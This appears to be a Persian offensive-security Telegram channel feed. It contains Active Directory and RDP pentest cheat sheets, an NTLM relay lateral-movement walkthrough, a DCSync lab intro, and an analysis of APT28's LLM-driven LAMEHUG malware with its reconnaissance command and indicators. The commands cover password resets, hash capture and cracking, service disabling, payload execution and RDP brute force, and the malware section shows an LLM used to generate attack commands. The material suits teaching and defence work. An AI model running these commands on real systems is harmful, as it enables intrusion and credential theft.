⭕️ یادداشت‌ های اکسپلویت از تست نفوذ Active Directory - بخش پایانی

حمله Force Change Password Attack

اگر برخی نام کاربری/رمز عبور و نام‌ های کاربری دیگر را پیدا کردیم، ممکن است بتوانیم رمز عبور کاربران دیگر را تغییر دهیم. کاربر نیاز به مجوز GenericAll برای تغییر رمز عبور کاربران دیگر دارد.

# -U: User credential who has the permission to change another user password
# -I: Target IP
# -S: Target server name
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"

Microsoft Management Console (mmc)
برای تنظیم AD، این دستورالعمل‌ها را دنبال کنید:
۱. روی آیکون ویندوز راست‌ کلیک کنید.
۲. روی "Run" کلیک کنید و "mmc" را وارد کنید سپس "OK" را کلیک کنید.
۳. در MMC، روی "File → Add or Remove Snap-ins" کلیک کنید.
۴. تمام سه "Active Directory…" snap-in را اضافه کنید.
۵. روی "Active Directory…" در پنل سمت چپ راست‌کلیک کنید و "Change Forest" را انتخاب کنید.
۶. دامنه را به عنوان Root domain وارد کنید و OK را کلیک کنید.
۷. روی "View → Advanced Features" کلیک کنید.

قرارداد نام‌ گذاری (Naming Convention)
اگر فهرست نام‌ های کاربری در Active Directory را پیدا کردیم، می‌توانیم نام‌ های کاربری را با قرارداد نام‌ گذاری تغییر دهیم.

برای مثال:

john smith -> jsmith, j.smith, john.smith
michael pole -> mpole, m.pole, michael.pole
ssh dc.example.com\\<ad_username>@sub.dc.example.com

تزریق اعتبارنامه‌ ها به حافظه (Inject Credentials into Memory)

# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe

پیکربندی DNS (DNS Configuration)

# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

حالا بررسی کنید که پیکربندی به درستی تنظیم شده است.

دانش پایه (Basic Knowledge)
مدیریت کاربر (User Management)
(Delegation)

در Active Directory، مدیر می‌تواند کاربر دیگری را برای مدیریت کاربران در یک واحد سازمانی (OU) Delegation کند، بدون privileges مدیر.

تنظیم (Setup)

"Active Directory Users and Computers" را باز کنید.
روی OU تارگت راست‌ کلیک کنید و روی “Delegate Control…” کلیک کنید. سپس پنجره جدید باز می‌شود.
در پنجره، نام کاربری که می‌خواهید privilege مدیریت کاربران را به او Delegation کنید، وارد کنید.
وظایفی را که کاربر واگذارشده(Delegation) باید مدیریت کند، انتخاب کنید.
OK را کلیک کنید.

مدیریت کاربران (Manage Users)

به عنوان کاربر واگذارشده وارد شوید.

برای مثال، اگر می‌خواهید رمز عبور john را بازنشانی کنید، دستور زیر را در PowerShell اجرا کنید. سپس رمز عبور جدید را در پرامپت وارد کنید.

Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

اولین باری که John پس از آن وارد سیستم می‌شود، می‌خواهیم John رمز عبور دلخواه خود را تغییر دهد نه رمزی که شما وارد کردید. برای این کار، دستور زیر را اجرا کنید.

Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose

حالا وقتی John وارد سیستم می‌شود، از او خواسته می‌شود رمز عبور جدیدی تغییر دهد.

رهگیری احراز هویت NetNTLM (Intercept NetNTLM Authentication)
Responder را شروع کنید تا برای هر درخواست LLMNR، NBT-NS، WPAD گوش کند.

sudo responder -I <interface-like-eth0>

Responder را تا دریافت برخی درخواست‌ها در حال اجرا نگه دارید.

اگر هش NTLM را دریافت کردید، آن را در ماشین محلی کرک کنید.

echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt

#NoteADExploit
@KavehOffSec

دوستان این اسکریپت قبلا نوشته بودم حال تغییرات و بهبود پیدا کرده امیدوارم براتون مفید باشه

ابزار ADKAVEH: شبیه‌سازی حملات و شناسایی در Active Directory با PowerShell

ADKAVEH یک اسکریپت PowerShell است که به تیم‌های امنیتی امکان شبیه‌سازی حملات و شناسایی در محیط‌های Active Directory را می‌دهد. این ابزار شامل ماژول‌هایی برای شبیه‌سازی حملاتی مانند Kerberoasting، AS-REP Roasting، Password Spraying و تست‌ های اختیاری برای غیرفعال‌سازی Windows Defender است.

https://github.com/TryHackBox/ADKAVEH

#tools
@KavehOffSec

💢 روز "بازگشایی آموزشگاها"

این روز خجسته را به همه‌ی مردم ايران بزرگ شادباش می‌گویم.
به ویژه خانواده‌هایی که دانش آموز از پایه يکم دبستان تا آموزشگاهای بزرگ کشور را دارند.
آرزوی آبرومندی ‌و رسیدن به برترین پایه‌های دانشیک و بهترین‌ ها را  آرزو داریم براتون.

APT28 LAMEHUG
اولین بدافزار مجهز به هوش مصنوعی در طبیعت

گروه هکری روس APT28 (Forest Blizzard, UAC-0001) با توسعه اولین بدافزار عمومی مستندشده که از یک مدل زبانی بزرگ (LLM) بهره می‌ برد، دوره جدیدی از حملات سایبری را معرفی کرده است. LAMEHUG فصل جدیدی در تاریخ بدافزارها گشوده است.

معماری فنی

اجزای اصلی:
- زبان برنامه‌نویسی: پایتون
- بسته‌بندی: PyInstaller (فایل‌های .pif)
- مدل زبانی: Qwen 2.5-Coder-32B-Instruct
- رابط برنامه‌نویسی (API): Hugging Face Inference API
- روش تحویل: ایمیل‌های فیشینگ حاوی فایل‌های ZIP

رویکرد انقلابی:
LAMEHUG
دستورات متنی به زبان طبیعی را دریافت کرده و از طریق مدل زبانی آن‌ ها را به دستورات سیستمی تبدیل می‌ کند که روی دستگاه آلوده اجرا می‌ شوند. این قابلیت امکان خودکارسازی وظایف پیچیده جاسوسی و سرقت داده‌ها را بدون نیاز به برنامه‌نویسی دستورات خاص فراهم می‌کند.

مکانیزم عملکرد

مرحله ۱: آلودگی

Appendix.pdf.zip → Appendix.pdf.pif → PyInstaller executable 

مرحله ۲: تولید دستورات توسط هوش مصنوعی
بدافزار درخواست‌هایی را به Qwen 2.5-Coder از طریق API Hugging Face ارسال می‌کند:
"تولید دستورات ویندوز برای جمع‌وآوری اطلاعات سیستمی شامل سخت‌افزار، پروسس ها، سرویس‌ ها و پیکربندی شبکه"

مرحله ۳: اجرای دستورات تولید شده
مدل زبانی دستورات آماده را باز می‌ گرداند و LAMEHUG آن‌ ها را از طریق cmd.exe اجرا می‌کند:

cmd.exe /c "mkdir %PROGRAMDATA%\info && 
systeminfo >> %PROGRAMDATA%\info\info.txt && 
wmic computersystem get name,manufacturer,model >> %PROGRAMDATA%\info\info.txt && 
wmic cpu get name,speed >> %PROGRAMDATA%\info\info.txt && 
wmic memorychip get capacity,speed >> %PROGRAMDATA%\info\info.txt && 
wmic diskdrive get model,size >> %PROGRAMDATA%\info\info.txt && 
wmic nic get name,macaddress,ipaddress >> %PROGRAMDATA%\info\info.txt && 
tasklist >> %PROGRAMDATA%\info\info.txt && 
net start >> %PROGRAMDATA%\info\info.txt && 
ipconfig /all >> %PROGRAMDATA%\info\info.txt && 
whoami /user >> %PROGRAMDATA%\info\info.txt && 
whoami /groups >> %PROGRAMDATA%\info\info.txt && 
net config workstation >> %PROGRAMDATA%\info\info.txt && 
dsquery user -samid %username% >> %PROGRAMDATA%\info\info.txt"

مرحله ۴: جمع‌ آوری و استخراج داده‌ ها
- جستجوی بازگشتی در پوشه‌ های Documents، Desktop، Downloads
- آماده‌ سازی فایل‌ ها برای استخراج
- انتقال داده‌ ها از طریق SFTP یا HTTP POST.

گونه‌های بدافزار

سه نسخه شناسایی شده است:

1. نسخه اصلی (Appendix.pdf.pif)
- قابلیت پایه تولید دستورات توسط هوش مصنوعی
- جمع‌آوری اطلاعات سیستمی
- استخراج داده‌ها از طریق SFTP

2.AI_generator_uncensored_Canvas_PRO_v0.9.exe
- قابلیت‌های پیشرفته‌ تر تولید دستورات
- روش‌ های جایگزین استخراج داده
- دور زدن محدودیت‌ های مدل زبانی

3. image.py
- نسخه اسکریپت پایتون
- منطق تغییر یافته برای استخراج
- احتمالاً نسخه آزمایشی

شاخص‌ های فنی

آرتیفکت‌ های فایل:
- %PROGRAMDATA%\info\info.txt 
- اطلاعات سیستمی
- Appendix.pdf.pif 
پیلود اصلی
- AI_generator_uncensored_Canvas_PRO_v0.9.exe

- نسخه جایگزین

شاخص‌ های شبکه‌ای:

- سرورهای C2: 144.126.202.227, 192.36.27.37
- دامنه‌ها:
boroda70@meta.ua, stayathomeclasses.com

- API: inference.huggingface.co (Qwen 2.5-Coder)

- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0

هش فایل‌ ها:

- 8013b23cb78407675f323d54b6b8dfb2a61fb40fb13309337f5b662dbd812a
- 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777
- a30930dfb655aa39c571c163ada65ba4dec30600df3bf548cc48bedd0e841416
- d6af1c9f5ce407e53ec73c8e7187ed804fb4f80cf8dbd6722fc69e15e135db2e
- bdb33bbb4ea11884b15f67e5c974136e6294aa87459cdc276ac2eea85b1deaa3
- 384e8f3d300205546fb8c9b9224011b3b3cb71adc994180ff55e1e6416f65715

روش‌ های شناسایی

1. نظارت بر فعالیت فایل:

 Sysmon Event ID 11: File creation in %PROGRAMDATA%\info\*
Suspicious files in writable directories: AppData, ProgramData, Users\Public

2. شناسایی جاسوسی:

   - اجرای چندین دستور شناسایی در بازه زمانی کوتاه:
whoami, systeminfo, wmic, ipconfig, net, tasklist

3. نظارت شبکه‌ای:

   - اتصالات به نقاط پایانی API مدل‌های زبانی:
     - inference.huggingface.co
     - api.openai.com
     - generativelanguage.googleapis.com
     - api.anthropic.com`

@KavehOffSec

۴. تحلیل رفتاری:
الگوهای غیرعادی اجرای دستورات
تولید خودکار دستورات سیستمی
جمع‌آوری انبوه اطلاعات سیستمی

اقدامات حفاظتی

اقدامات فوری:
۱. مسدود کردن IoCهای شناخته‌شده (IPها، دامنه‌ها، هش‌ ها)
۲. نظارت بر دسترسی‌ ها به API LLM
۳. تقویت کنترل پیوست‌ های ایمیل
۴. بررسی دایرکتوری %PROGRAMDATA%\info\

اقدامات بلندمدت:

# مسدود کردن API LLM (اگر به طور قانونی استفاده نشود)
netsh advfirewall firewall add rule name="Block_LLM_APIs" 
dir=out action=block remoteip=inference.huggingface.co

نظارت بر پروسس های مشکوک

wevtutil qe Security /q:"*[System[EventID=4688] and 
EventData[Data[@Name='NewProcessName'] and 
(contains(.,'wmic') or contains(.,'systeminfo'))]]"

قوانین YARA برای شناسایی:

rule LAMEHUG_AI_Malware {
    meta:
        denoscription = "شناسایی بدافزار مبتنی بر هوش مصنوعی LAMEHUG"
        author = "تحقیقات امنیتی"
        date = "2025-07-30"
    
    strings:
        $api1 = "inference.huggingface.co"
        $api2 = "Qwen2.5-Coder"
        $path = "%PROGRAMDATA%\\info\\info.txt"
        $cmd1 = "systeminfo >>"
        $cmd2 = "wmic computersystem"
        
    condition:
        2 of them
}

ارزش برای صنعت

عصر جدیدی از تهدیدها:
LAMEHUG
نشان‌ دهنده تغییری اساسی در توسعه بدافزار است. استفاده از LLM برای تولید پویای دستورات، بدافزار را انطباق‌ پذیرتر و سخت‌ تر برای شناسایی می‌کند.

ریسک‌های کلیدی:
- خودکارسازی حملات پیچیده بدون تخصص
- دور زدن سیگنچرهای استاتیک از طریق تولید پویا
- کاهش موانع ورود برای مجرمان سایبری
- مقیاس‌ پذیری حملات شخصی‌ سازی‌ شده

تکامل حفاظت:
روش‌های شناسایی سنتی مبتنی بر سیگنچرهای استاتیک، کمتر مؤثر می‌شوند. نیاز به گذار به تحلیل رفتاری و نظارت بر فعالیت هوش مصنوعی وجود دارد.

پیش‌بینی‌های توسعه

آینده نزدیک:
- ادغام LLMهای قدرتمندتر (GPT-4، Claude)
- LLMهای محلی برای اجتناب از شاخص‌ های شبکه‌ ای
- تولید کد پلی‌ مورفیک توسط هوش مصنوعی
- مهندسی اجتماعی خودکار

فناوری‌های حفاظتی:
- سیستم‌ های شناسایی مبتنی بر هوش مصنوعی
- تحلیل رفتاری استفاده از هوش مصنوعی
- نظارت و فیلترینگ API LLM
- تکنیک‌ های هوش مصنوعی خصمانه

نتیجه‌گیری

LAMEHUG
آغاز عصر جدیدی در امنیت سایبری است. APT28 نشان داد که چگونه هوش مصنوعی می‌تواند برای ایجاد تهدیدهای پیچیده‌تر و انطباق‌پذیرتر سلاح‌ سازی شود.

نکات بحرانی:
- اولین مورد استفاده جنگی از LLM در بدافزار
- تولید پویای دستورات از طریق هوش مصنوعی
- کاهش موانع فنی برای مهاجمان
- نیاز به بازنگری رویکردهای حفاظتی


#APT28
@KavehOffSec

📖 Credential Dumping DCSync Attack


حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامه‌ها از کنترل‌کننده دامنه (DC) به‌کار می‌برند، با این روش که خود را شبیه یک کنترل‌کننده دامنه نشان می‌دهند.


راه‌اندازی یک محیط آزمایشگاهی برای شبیه ‌سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی ‌های کاهش خطر
راه‌اندازی لاب (Lab Setup)

نیازمندی‌ها:
یک محیط مجازی ‌سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که به‌عنوان کنترل‌کننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترل‌کننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا به‌عنوان کنترل‌کننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را به‌صورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راه‌اندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehOffSec
@TryHackBox

آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP

این مقاله یک سناریو واقعی از تست نفوذ را نشان می‌دهد که در آن مهاجم پس از دستیابی به دسترسی اولیه به یک سرور،با غیرفعال کردن عمدی سرویس‌ های حیاتی NetLogon، LanManServer و LanManWorkstation، مسیر معمول NTLM Relay از طریق پورت 445 را مسدود می‌ کند.

مراحل دقیق حمله:

1. غیرفعال کردن سرویس‌های حیاتی:

sc stop netlogon
sc stop lanmanserver
sc config lanmanserver start= disabled
sc stop lanmanworkstation
sc config lanmanworkstation start= disabled

2. تأیید بسته بودن پورت 445:

 nmap -p 445 -sT -Pn <serverIP>

3. راه حل جایگزین - استفاده از Kerberos:

■ استخراج هش‌های NTLM از LSA Secrets با secretsdump.py
■ به دست آوردن Domain SID با lookupsid.py
■ ساخت Silver Ticket با ticketer.py

4. دسترسی به سیستم تارگت:
■ استفاده از atexec-pro.py برای اجرای دستور از راه دور
■ آپلود و اجرای پیلود (msf_win_x64.exe)

⚠️ سلب مسئولیت:
این محتوا صرفاً برای اهداف آموزشی و در محیط ‌های لابراتور مجاز ارائه می ‌شود.
@KavehOffSec

🔖 آماده‌ سازی برای NTLM Relay از راه دور: Lateral Movement بدون NTLM و پورت 445/TCP
@KavehOffSec

CVE-2025-59287 (CVSS 9.8)

آسیب‌پذیری بحرانی RCE در WSUS

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287

@KavehOffSec

RDP بکدور
RDP Shadowing
فعال‌سازی Shadowing RDP
شمارش کاربران فعال
استفاده از shadow mode
سناریوی حمله کامل


@KavehOffSec

منم كوروش، شاه جهان، شاه بزرگ، شاه نيرومند، شاه بابِل، شاه سومر و اَكد، شاه چهار گوشه جهان.

هفتم آبان، روز بزرگداشت کوروش بزرگ است؛ پادشاهی که نه فقط برای ایرانیان، بلکه برای تمام جهان نماد انسانیت، داد و آزادی است.

یادآوری و پاسداشت چنین روزی، یادآوری ریشه‌های تاریخی و فرهنگی ماست؛ یادآوری میراثی که بر پایه خرد، عدالت و احترام به انسان بنا شده است.

امروز اگرچه جامعه ما با چالش‌ها و مشکلات فراوان روبه‌روست، اما نباید بگذاریم این دشواری‌ها، ما را از یادآوری و پاسداشت تاریخ و هویت ایرانی‌مان دور کند.

هفتم آبان بزرگداشت کوروش بزرگ بر تمام ایرانیان همایون باد

🔖 پروتکل ریموت دسکتاپ - تست نفوذ RDP

پروتکل ریموت دکستاپ RDP پروتکلی است که به کاربر یک رابط گرافیکی ارائه می‌ دهد تا از طریق اتصال شبکه به کامپیوتر دیگری متصل شود. پورت پیش‌ فرض آن ۳۳۸۹ است.

Enumeration

nmap --noscript rdp-enum-encryption -p 3389 <target-ip>
nmap --noscript rdp-ntlm-info -p 3389 <target-ip>
nmap --noscript rdp* -p 3389 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> rdp
hydra -L usernames.txt -p password <target-ip> rdp

Connect
Remmina

Remmina :
یک کلاینت ریپوت دکستاپ برای سیستم‌ عامل‌ های کامپیوتری مبتنی بر POSIX است..


remmina :

# -c: Connect given URI or file
remmina -c rdp://username@vulnerable.com
remmina -c rdp://domain\\username@vulnerable.com
remmina -c rdp://username:password@vulnerable.com

# ---------------------------------------------------------------------------------

# Settings

# Keyboard mapping
1. On Remmina client window, click menu icon and move to "Preferences".
2. Navigate to "RDP" tab and check "Use client keyboard mapping".
3. Reboot Remmina

FreeRDP

xfreerdp /u:username /v:10.0.0.1:3389
xfreerdp /u:username /p:password /cert:ignore /v:10.0.0.1 /workarea
# Create a shared drive (/drive:LOCAL_DIR,SHARE_NAME)
xfreerdp /u:username /p:password /drive:.,share /v:10.0.0.1
# Useful command for exploiting
xfreerdp /v:10.0.0.1 /u:username /p:password +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

# --------------------------------------------------------------------------------

# On remote Windows

# Access share directory in Command Prompt or PowerShell
\\tsclient\\~share\

Rdesktop

rdesktop -u username -p password 10.0.0.1:3389

#RDP
@KavehOffSec